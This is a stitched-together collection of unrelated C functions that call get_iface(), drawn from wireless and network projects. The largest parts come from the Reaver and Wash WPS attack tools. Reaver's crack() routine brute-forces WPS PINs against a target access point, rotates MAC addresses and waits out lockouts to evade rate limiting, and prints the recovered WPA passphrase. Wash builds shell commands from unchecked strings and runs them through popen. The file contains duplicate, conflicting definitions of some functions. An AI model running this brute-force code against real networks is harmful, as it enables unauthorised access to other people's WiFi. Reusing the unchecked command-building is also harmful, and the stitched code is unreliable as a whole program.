int change_channel(int channel) { int skfd = 0, ret_val = 0; struct iwreq wrq; memset((void *) &wrq, 0, sizeof(struct iwreq)); /* Open NET socket */ if((skfd = iw_sockets_open()) < 0) { perror("iw_sockets_open"); } else if(get_iface()) { /* Convert channel to a frequency */ iw_float2freq((double) channel, &(wrq.u.freq)); /* Fixed frequency */ wrq.u.freq.flags = IW_FREQ_FIXED; cprintf(VERBOSE, "[+] Switching %s to channel %d\n", get_iface(), channel); /* Set frequency */ if(iw_set_ext(skfd, get_iface(), SIOCSIWFREQ, &wrq) >= 0) { set_channel(channel); ret_val = 1; } iw_sockets_close(skfd); } return ret_val; }
/* Closes libpcap during sleep period to avoid stale packet data in pcap buffer */ void pcap_sleep(int seconds) { if(seconds > 0) { pcap_close(get_handle()); set_handle(NULL); sleep(seconds); set_handle(capture_init(get_iface())); if(!get_handle()) { cprintf(CRITICAL, "[-] Failed to re-initialize interface '%s'\n", get_iface()); } } }
/* Given a destination ip address: * - find interface the packet would be shipped through * - return this interface's ip address as the src ip address */ uint32_t find_srcip(uint32_t dest) { struct sr_instance* sr = sr_get_global_instance(0); router_state* rs = (router_state*)sr->interface_subsystem; iface_entry* iface_struct; char *iface = 0; struct in_addr dst; struct in_addr src; uint32_t srcip; iface = calloc(32, sizeof(char)); dst.s_addr = dest; src.s_addr = 0; lock_if_list_rd(rs); lock_rtable_rd(rs); if(get_next_hop(&src, iface, 32, rs, &dst)) { srcip = 0; } else { iface_struct = get_iface(rs, iface); assert(iface_struct); srcip = iface_struct->ip; } unlock_rtable(rs); unlock_if_list(rs); return srcip; }
static void process_msg(struct slip_context *slip) { u16_t vlan_tag = NET_VLAN_TAG_UNSPEC; struct net_pkt *pkt; pkt = slip_poll_handler(slip); if (!pkt || !pkt->frags) { return; } #if defined(CONFIG_NET_VLAN) { struct net_eth_hdr *hdr = NET_ETH_HDR(pkt); if (ntohs(hdr->type) == NET_ETH_PTYPE_VLAN) { struct net_eth_vlan_hdr *hdr_vlan = (struct net_eth_vlan_hdr *)NET_ETH_HDR(pkt); net_pkt_set_vlan_tci(pkt, ntohs(hdr_vlan->vlan.tci)); vlan_tag = net_pkt_vlan_tag(pkt); } } #endif if (net_recv_data(get_iface(slip, vlan_tag), pkt) < 0) { net_pkt_unref(pkt); } slip->rx = NULL; slip->last = NULL; }
/* Populates globule->mac with the MAC address of the interface globule->iface */ int read_iface_mac() { struct ifreq ifr; struct ether_addr *eth = NULL; int sock = 0, ret_val = 0; /* Need a socket for the ioctl call */ sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_IP); if(sock != -1) { eth = malloc(sizeof(struct ether_addr)); if(eth) { memset(eth, 0, sizeof(struct ether_addr)); /* Prepare request */ memset(&ifr, 0, sizeof(struct ifreq)); strncpy(ifr.ifr_name, get_iface(), IFNAMSIZ); /* Do it */ if(ioctl(sock, SIOCGIFHWADDR, &ifr) == 0) { set_mac((unsigned char *) &ifr.ifr_hwaddr.sa_data); ret_val = 1; } free(eth); } close(sock); } return ret_val; }
static int read_data(struct eth_context *ctx, int fd) { u16_t vlan_tag = NET_VLAN_TAG_UNSPEC; struct net_if *iface; struct net_pkt *pkt = NULL; int status; int count; count = eth_read_data(fd, ctx->recv, sizeof(ctx->recv)); if (count <= 0) { return 0; } #if defined(CONFIG_NET_VLAN) { struct net_eth_hdr *hdr = (struct net_eth_hdr *)(ctx->recv); if (ntohs(hdr->type) == NET_ETH_PTYPE_VLAN) { pkt = prepare_vlan_pkt(ctx, count, &vlan_tag, &status); if (!pkt) { return status; } } else { pkt = prepare_non_vlan_pkt(ctx, count, &status); if (!pkt) { return status; } net_pkt_set_vlan_tci(pkt, 0); } } #else { pkt = prepare_non_vlan_pkt(ctx, count, &status); if (!pkt) { return status; } } #endif iface = get_iface(ctx, vlan_tag); update_gptp(iface, pkt, false); if (net_recv_data(iface, pkt) < 0) { net_pkt_unref(pkt); } return 0; }
int change_channel(int channel) { cprintf(VERBOSE, "[+] Switching %s to channel %d\n", get_iface(), channel); // Unfortunately, there is no API to change the channel pid_t pid = fork(); if (!pid) { char chan_arg[32]; sprintf(chan_arg, "-c%d", channel); char* argv[] = {"/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport", chan_arg, NULL}; execve("/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport", argv, NULL); } int status; waitpid(pid,&status,0); set_channel(channel); return 0; }
int read_iface_mac() { struct ifaddrs* iflist; int found = 0; if (getifaddrs(&iflist) == 0) { struct ifaddrs* cur; for (cur = iflist; cur; cur = cur->ifa_next) { if ((cur->ifa_addr->sa_family == AF_LINK) && (strcmp(cur->ifa_name, get_iface()) == 0) && cur->ifa_addr) { struct sockaddr_dl* sdl = (struct sockaddr_dl*)cur->ifa_addr; set_mac(LLADDR(sdl)); found = 1; break; } } freeifaddrs(iflist); } return found; }
int reaver_main(int argc, char **argv) { int ret_val = EXIT_FAILURE, r = 0; time_t start_time = 0, end_time = 0; struct wps_data *wps = NULL; globule_init(); init_default_settings(); fprintf(stderr, "\nReaver v%s WiFi Protected Setup Attack Tool\n", get_version()); fprintf(stderr, "Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <*****@*****.**>\n\n"); if(argc < 2) { ret_val = reaver_usage(argv[0]); goto end; } /* Process the command line arguments */ if(process_arguments(argc, argv) == EXIT_FAILURE) { ret_val = reaver_usage(argv[0]); goto end; } /* Double check reaver_usage */ if(!get_iface() || (memcmp(get_bssid(), NULL_MAC, MAC_ADDR_LEN) == 0)) { reaver_usage(argv[0]); goto end; } /* If no MAC address was provided, get it ourselves */ if(memcmp(get_mac(), NULL_MAC, MAC_ADDR_LEN) == 0) { if(!read_iface_mac()) { fprintf(stderr, "[-] Failed to retrieve a MAC address for interface '%s'!\n", get_iface()); goto end; } } /* Sanity checking on the message timeout value */ if(get_m57_timeout() > M57_MAX_TIMEOUT) { set_m57_timeout(M57_MAX_TIMEOUT); } else if(get_m57_timeout() <= 0) { set_m57_timeout(M57_DEFAULT_TIMEOUT); } /* Sanity checking on the receive timeout value */ if(get_rx_timeout() <= 0) { set_rx_timeout(DEFAULT_TIMEOUT); } /* Initialize signal handlers */ sigint_init(); sigalrm_init(); /* Mark the start time */ start_time = time(NULL); /* Do it. */ crack(); /* Mark the end time */ end_time = time(NULL); /* Check our key status */ if(get_key_status() == KEY_DONE) { wps = get_wps(); cprintf(VERBOSE, "[+] Pin cracked in %d seconds\n", (int) (end_time - start_time)); cprintf(CRITICAL, "[+] WPS PIN: '%s'\n", get_pin()); if(wps->key) cprintf(CRITICAL, "[+] WPA PSK: '%s'\n", wps->key); if(wps->essid) cprintf(CRITICAL, "[+] AP SSID: '%s'\n", wps->essid); /* Run user-supplied command */ if(get_exec_string()) { r = system(get_exec_string()); } ret_val = EXIT_SUCCESS; } else { cprintf(CRITICAL, "[-] Failed to recover WPA key\n"); } save_session(); end: globule_deinit(); return ret_val; }
int main(int argc, char *argv[]) { int c = 0; FILE *fp = NULL; int long_opt_index = 0, i = 0, channel = 0, passive = 0, mode = 0; int source = INTERFACE, ret_val = EXIT_FAILURE; struct bpf_program bpf = { 0 }; char *out_file = NULL, *last_optarg = NULL, *target = NULL, *bssid = NULL; char *short_options = "i:c:n:o:b:5sfuCDh"; struct option long_options[] = { { "bssid", required_argument, NULL, 'b' }, { "interface", required_argument, NULL, 'i' }, { "channel", required_argument, NULL, 'c' }, { "out-file", required_argument, NULL, 'o' }, { "probes", required_argument, NULL, 'n' }, { "daemonize", no_argument, NULL, 'D' }, { "file", no_argument, NULL, 'f' }, { "ignore-fcs", no_argument, NULL, 'C' }, { "5ghz", no_argument, NULL, '5' }, { "scan", no_argument, NULL, 's' }, { "survey", no_argument, NULL, 'u' }, { "help", no_argument, NULL, 'h' }, { 0, 0, 0, 0 } }; fprintf(stderr, "\nWash v%s WiFi Protected Setup Scan Tool\n", PACKAGE_VERSION); fprintf(stderr, "Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <*****@*****.**>\n\n"); globule_init(); sql_init(); create_ap_table(); set_auto_channel_select(0); set_wifi_band(BG_BAND); set_debug(INFO); set_validate_fcs(1); set_log_file(stdout); set_max_num_probes(DEFAULT_MAX_NUM_PROBES); while((c = getopt_long(argc, argv, short_options, long_options, &long_opt_index)) != -1) { switch(c) { case 'f': source = PCAP_FILE; break; case 'i': set_iface(optarg); break; case 'b': bssid = strdup(optarg); break; case 'c': channel = atoi(optarg); set_fixed_channel(1); break; case '5': set_wifi_band(AN_BAND); break; case 'n': set_max_num_probes(atoi(optarg)); break; case 'o': out_file = strdup(optarg); break; case 's': mode = SCAN; break; case 'u': mode = SURVEY; break; case 'C': set_validate_fcs(0); break; case 'D': daemonize(); break; default: usage(argv[0]); goto end; } /* Track the last optarg. This is used later when looping back through any specified pcap files. */ if(optarg) { if(last_optarg) { free(last_optarg); } last_optarg = strdup(optarg); } } /* The interface value won't be set if capture files were specified; else, there should have been an interface specified */ if(!get_iface() && source != PCAP_FILE) { usage(argv[0]); goto end; } if(get_iface() && source == PCAP_FILE) { cprintf(CRITICAL, "[X] ERROR: -i and -f options cannot be used together.\n"); usage(argv[0]); goto end; } /* If we're reading from a file, be sure we don't try to transmit probe requests */ if(source == PCAP_FILE) { passive = 1; } /* Open the output file, if any. If none, write to stdout. */ if(out_file) { fp = fopen(out_file, "wb"); if(!fp) { cprintf(CRITICAL, "[X] ERROR: Failed to open '%s' for writing\n", out_file); goto end; } set_log_file(fp); } /* * Loop through all of the specified capture sources. If an interface was specified, this will only loop once and the * call to monitor() will block indefinitely. If capture files were specified, this will loop through each file specified * on the command line and monitor() will return after each file has been processed. */ for(i=argc-1; i>0; i--) { /* If the source is a pcap file, get the file name from the command line */ if(source == PCAP_FILE) { /* If we've gotten to the arguments, we're done */ if((argv[i][0] == '-') || (last_optarg && (memcmp(argv[i], last_optarg, strlen(last_optarg)) == 0)) ) { break; } else { target = argv[i]; } } /* Else, use the specified interface name */ else { target = get_iface(); } set_handle(capture_init(target)); if(!get_handle()) { cprintf(CRITICAL, "[X] ERROR: Failed to open '%s' for capturing\n", get_iface()); goto end; } if(pcap_compile(get_handle(), &bpf, PACKET_FILTER, 0, 0) != 0) { cprintf(CRITICAL, "[X] ERROR: Failed to compile packet filter\n"); goto end; } if(pcap_setfilter(get_handle(), &bpf) != 0) { cprintf(CRITICAL, "[X] ERROR: Failed to set packet filter\n"); goto end; } /* Do it. */ monitor(bssid, passive, source, channel, mode); printf("\n"); } ret_val = EXIT_SUCCESS; end: globule_deinit(); sql_cleanup(); if(bssid) free(bssid); if(out_file) free(out_file); if(wpsmon.fp) fclose(wpsmon.fp); return ret_val; }
void parse_wps_settings(const u_char *packet, struct pcap_pkthdr *header, char *target, int passive, int mode, int source) { struct radio_tap_header *rt_header = NULL; struct dot11_frame_header *frame_header = NULL; struct libwps_data *wps = NULL; enum encryption_type encryption = NONE; char *bssid = NULL, *ssid = NULL, *lock_display = NULL; int wps_parsed = 0, probe_sent = 0, channel = 0, rssi = 0; static int channel_changed = 0; char info_manufac[500]; char info_modelnum[500]; char info_modelserial[500]; wps = malloc(sizeof(struct libwps_data)); memset(wps, 0, sizeof(struct libwps_data)); if(packet == NULL || header == NULL || header->len < MIN_BEACON_SIZE) { goto end; } rt_header = (struct radio_tap_header *) radio_header(packet, header->len); frame_header = (struct dot11_frame_header *) (packet + rt_header->len); /* If a specific BSSID was specified, only parse packets from that BSSID */ if(!is_target(frame_header)) { goto end; } set_ssid(NULL); bssid = (char *) mac2str(frame_header->addr3, ':'); set_bssid((unsigned char *) frame_header->addr3); if(bssid) { if((target == NULL) || (target != NULL && strcmp(bssid, target) == 0)) { channel = parse_beacon_tags(packet, header->len); rssi = signal_strength(packet, header->len); ssid = (char *) get_ssid(); if(target != NULL && channel_changed == 0) { ualarm(0, 0); change_channel(channel); channel_changed = 1; } if(frame_header->fc.sub_type == PROBE_RESPONSE || frame_header->fc.sub_type == SUBTYPE_BEACON) { wps_parsed = parse_wps_parameters(packet, header->len, wps); } if(!is_done(bssid) && (get_channel() == channel || source == PCAP_FILE)) { if(frame_header->fc.sub_type == SUBTYPE_BEACON && mode == SCAN && !passive && should_probe(bssid)) { send_probe_request(get_bssid(), get_ssid()); probe_sent = 1; } if(!insert(bssid, ssid, wps, encryption, rssi)) { update(bssid, ssid, wps, encryption); } else if(wps->version > 0) { switch(wps->locked) { case WPSLOCKED: lock_display = YES; break; case UNLOCKED: case UNSPECIFIED: lock_display = NO; break; } //ideas made by kcdtv if(get_chipset_output == 1) //if(1) { if (c_fix == 0) { //no use a fixed channel cprintf(INFO,"Option (-g) REQUIRES a channel to be set with (-c)\n"); exit(0); } FILE *fgchipset=NULL; char cmd_chipset[4000]; char cmd_chipset_buf[4000]; char buffint[5]; char *aux_cmd_chipset=NULL; memset(cmd_chipset, 0, sizeof(cmd_chipset)); memset(cmd_chipset_buf, 0, sizeof(cmd_chipset_buf)); memset(info_manufac, 0, sizeof(info_manufac)); memset(info_modelnum, 0, sizeof(info_modelnum)); memset(info_modelserial, 0, sizeof(info_modelserial)); strcat(cmd_chipset,"reaver -0 -s y -vv -i "); //need option to stop reaver in m1 stage strcat(cmd_chipset,get_iface()); strcat(cmd_chipset, " -b "); strcat(cmd_chipset, mac2str(get_bssid(),':')); strcat(cmd_chipset," -c "); snprintf(buffint, sizeof(buffint), "%d",channel); strcat(cmd_chipset, buffint); //cprintf(INFO,"\n%s\n",cmd_chipset); if ((fgchipset = popen(cmd_chipset, "r")) == NULL) { printf("Error opening pipe!\n"); //return -1; } while (fgets(cmd_chipset_buf, 4000, fgchipset) != NULL) { //[P] WPS Manufacturer: xxx //[P] WPS Model Number: yyy //[P] WPS Model Serial Number: zzz //cprintf(INFO,"\n%s\n",cmd_chipset_buf); aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Manufacturer:"); if(aux_cmd_chipset != NULL) { //bug fix by alxchk strncpy(info_manufac, aux_cmd_chipset+21, sizeof(info_manufac)); } aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Model Number:"); if(aux_cmd_chipset != NULL) { //bug fix by alxchk strncpy(info_modelnum, aux_cmd_chipset+21, sizeof(info_modelnum)); } aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Model Serial Number:"); if(aux_cmd_chipset != NULL) { //bug fix by alxchk strncpy(info_modelserial, aux_cmd_chipset+28, sizeof(info_modelserial)); } } //cprintf(INFO,"\n%s\n",info_manufac); info_manufac[strcspn ( info_manufac, "\n" )] = '\0'; info_modelnum[strcspn ( info_modelnum, "\n" )] = '\0'; info_modelserial[strcspn ( info_modelserial, "\n" )] = '\0'; if(pclose(fgchipset)) { //printf("Command not found or exited with error status\n"); //return -1; } } if (o_file_p == 0) { cprintf(INFO, "%17s %2d %.2d %d.%d %s %s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid); } else { if(get_chipset_output == 1) { cprintf(INFO, "%17s|%2d|%.2d|%d.%d|%s|%s|%s|%s|%s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid, info_manufac, info_modelnum, info_modelserial); }else { cprintf(INFO, "%17s|%2d|%.2d|%d.%d|%s|%s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid); } }
/* Brute force all possible WPS pins for a given access point */ void crack() { unsigned char *bssid = NULL; char *pin = NULL; int fail_count = 0, loop_count = 0, sleep_count = 0, assoc_fail_count = 0; float pin_count = 0; time_t start_time = 0; enum wps_result result = 0; /* MAC CHANGER VARIABLES */ int mac_changer_counter = 0; char mac[MAC_ADDR_LEN] = { 0 }; unsigned char mac_string [] = "ZZ:ZZ:ZZ:ZZ:ZZ:ZZ"; unsigned char* new_mac = &mac_string[0]; char last_digit = '0'; if(!get_iface()) { return; } if(get_max_pin_attempts() == -1) { cprintf(CRITICAL, "[X] ERROR: This device has been blacklisted and is not supported.\n"); return; } /* Initialize network interface */ set_handle(capture_init(get_iface())); if(get_handle() != NULL) { generate_pins(); /* Restore any previously saved session */ if(get_static_p1() == NULL) { restore_session(); } /* Convert BSSID to a string */ bssid = mac2str(get_bssid(), ':'); /* * We need to get some basic info from the AP, and also want to make sure the target AP * actually exists, so wait for a beacon packet */ cprintf(INFO, "[+] Waiting for beacon from %s\n", bssid); read_ap_beacon(); process_auto_options(); /* I'm fairly certian there's a reason I put this in twice. Can't remember what it was now though... */ if(get_max_pin_attempts() == -1) { cprintf(CRITICAL, "[X] ERROR: This device has been blacklisted and is not supported.\n"); return; } /* This initial association is just to make sure we can successfully associate */ while(!reassociate()) { if(assoc_fail_count == MAX_ASSOC_FAILURES) { assoc_fail_count = 0; cprintf(CRITICAL, "[!] WARNING: Failed to associate with %s (ESSID: %s)\n", bssid, get_ssid()); } else { assoc_fail_count++; } } cprintf(INFO, "[+] Associated with %s (ESSID: %s)\n", bssid, get_ssid()); /* Used to calculate pin attempt rates */ start_time = time(NULL); /* If the key status hasn't been explicitly set by restore_session(), ensure that it is set to KEY1_WIP */ if(get_key_status() <= KEY1_WIP) { set_key_status(KEY1_WIP); } /* * If we're starting a session at KEY_DONE, that means we've already cracked the pin and the AP is being re-attacked. * Re-set the status to KEY2_WIP so that we properly enter the main cracking loop. */ else if(get_key_status() == KEY_DONE) { set_key_status(KEY2_WIP); } //copy the current mac to the new_mac variable for mac changer if (get_mac_changer() == 1) { strncpy(new_mac, mac2str(get_mac(), ':'), 16); } /* Main cracking loop */ for(loop_count=0, sleep_count=0; get_key_status() != KEY_DONE; loop_count++, sleep_count++) { //MAC Changer switch/case to define the last mac address digit if (get_mac_changer() == 1) { switch (mac_changer_counter) { case 0: last_digit = '0'; break; case 1: last_digit = '1'; break; case 2: last_digit = '2'; break; case 3: last_digit = '3'; break; case 4: last_digit = '4'; break; case 5: last_digit = '5'; break; case 6: last_digit = '6'; break; case 7: last_digit = '7'; break; case 8: last_digit = '8'; break; case 9: last_digit = '9'; break; case 10: last_digit = 'A'; break; case 11: last_digit = 'B'; break; case 12: last_digit = 'C'; break; case 13: last_digit = 'D'; break; case 14: last_digit = 'E'; break; case 15: last_digit = 'F'; mac_changer_counter = -1; break; } mac_changer_counter++; new_mac[16] = last_digit; //transform the string to a MAC and define the MAC str2mac((unsigned char *) new_mac, (unsigned char *) &mac); set_mac((unsigned char *) &mac); cprintf(WARNING, "[+] Using MAC %s \n", mac2str(get_mac(), ':')); } /* * Some APs may do brute force detection, or might not be able to handle an onslaught of WPS * registrar requests. Using a delay here can help prevent the AP from locking us out. */ pcap_sleep(get_delay()); /* Users may specify a delay after x number of attempts */ if((get_recurring_delay() > 0) && (sleep_count == get_recurring_delay_count())) { cprintf(VERBOSE, "[+] Entering recurring delay of %d seconds\n", get_recurring_delay()); pcap_sleep(get_recurring_delay()); sleep_count = 0; } /* * Some APs identify brute force attempts and lock themselves for a short period of time (typically 5 minutes). * Verify that the AP is not locked before attempting the next pin. */ while(get_ignore_locks() == 0 && is_wps_locked()) { cprintf(WARNING, "[!] WARNING: Detected AP rate limiting, waiting %d seconds before re-checking\n", get_lock_delay()); pcap_sleep(get_lock_delay()); } /* Initialize wps structure */ set_wps(initialize_wps_data()); if(!get_wps()) { cprintf(CRITICAL, "[-] Failed to initialize critical data structure\n"); break; } /* Try the next pin in the list */ pin = build_next_pin(); if(!pin) { cprintf(CRITICAL, "[-] Failed to generate the next payload\n"); break; } else { cprintf(WARNING, "[+] Trying pin %s\n", pin); } /* * Reassociate with the AP before each WPS exchange. This is necessary as some APs will * severely limit our pin attempt rate if we do not. */ assoc_fail_count = 0; while(!reassociate()) { if(assoc_fail_count == MAX_ASSOC_FAILURES) { assoc_fail_count = 0; cprintf(CRITICAL, "[!] WARNING: Failed to associate with %s (ESSID: %s)\n", bssid, get_ssid()); } else { assoc_fail_count++; } } /* * Enter receive loop. This will block until a receive timeout occurs or a * WPS transaction has completed or failed. */ result = do_wps_exchange(); switch(result) { /* * If the last pin attempt was rejected, increment * the pin counter, clear the fail counter and move * on to the next pin. */ case KEY_REJECTED: fail_count = 0; pin_count++; advance_pin_count(); break; /* Got it!! */ case KEY_ACCEPTED: break; /* Unexpected timeout or EAP failure...try this pin again */ default: cprintf(VERBOSE, "[!] WPS transaction failed (code: 0x%.2X), re-trying last pin\n", result); fail_count++; break; } /* If we've had an excessive number of message failures in a row, print a warning */ if(fail_count == WARN_FAILURE_COUNT) { cprintf(WARNING, "[!] WARNING: %d failed connections in a row\n", fail_count); fail_count = 0; pcap_sleep(get_fail_delay()); } /* Display status and save current session state every DISPLAY_PIN_COUNT loops */ if(loop_count == DISPLAY_PIN_COUNT) { save_session(); display_status(pin_count, start_time); loop_count = 0; } /* * The WPA key and other settings are stored in the globule->wps structure. If we've * recovered the WPS pin and parsed these settings, don't free this structure. It * will be freed by wpscrack_free() at the end of main(). */ if(get_key_status() != KEY_DONE) { wps_deinit(get_wps()); set_wps(NULL); } /* If we have cracked the pin, save a copy */ else { set_pin(pin); } free(pin); pin = NULL; /* If we've hit our max number of pin attempts, quit */ if((get_max_pin_attempts() > 0) && (pin_count == get_max_pin_attempts())) { cprintf(VERBOSE, "[+] Quitting after %d crack attempts\n", get_max_pin_attempts()); break; } } if(bssid) free(bssid); if(get_handle()) { pcap_close(get_handle()); set_handle(NULL); } } else { cprintf(CRITICAL, "[-] Failed to initialize interface '%s'\n", get_iface()); } }
int load_extension_library(PARSECONTEXT * ctx, YYLTYPE *loc, const char *sval ) { char *alt_name = 0; SHLIB *shlib = 0; FN_get_honey_jar_interface get_iface; size_t i; AST_XFUNC_DECL *xlib; if (access( sval, R_OK )) { alt_name = INC_PATH_resolve( ctx->lexctx.inc_path, sval ); if (!alt_name) { char *spath; char *sval2 = FN_set_extension( sval, SHARED_LIBRARY_EXTENSION ); if (sval2) { alt_name = INC_PATH_resolve( ctx->lexctx.inc_path, sval2 ); } free(sval2); if (!alt_name) { spath = INC_PATH_to_text( ctx->lexctx.inc_path ); do_yyerror( loc, ctx, "Can't open file %s, tried to open the file in current directory %s%s Try to specify the search path with -I <directory name> or -i <directory name> command line options.", sval, spath != 0 ? "and then in each directory that is part of the search path: " : 0, spath != 0 ? spath : 0 ); goto err; } } sval = alt_name; } shlib = (SHLIB *) malloc( sizeof( SHLIB ) ); if (!shlib || SHLIB_load( shlib, sval )) { do_yyerror( loc, ctx, "can't load the extension library %s. %s", sval, shlib->last_error ? shlib->last_error : 0); goto err; } get_iface = (FN_get_honey_jar_interface) SHLIB_get_proc_addr( shlib, "get_honey_jar_interface" ); if (!get_iface) { do_yyerror( loc, ctx, "can't load the extension library %s. It does not have a function called get_honey_jar_interface. %s", sval, shlib->last_error ? shlib->last_error : 0); goto err; } xlib = get_iface(); if (!xlib) { do_yyerror( loc, ctx, "can't load the extension library %s. the get_honey_jar_interface did not return a value", sval ); goto err; } for(i=0; xlib[i].f_name != 0 ; i++ ) { PARSECONTEXT_add_function_def( ctx, &xlib[i] ); } ARRAY_push_back( &ctx->extension_libs, &shlib, sizeof(void *) ); return 0; err: if (shlib) { SHLIB_unload(shlib); free(shlib); } if (alt_name) free(alt_name); return 1; }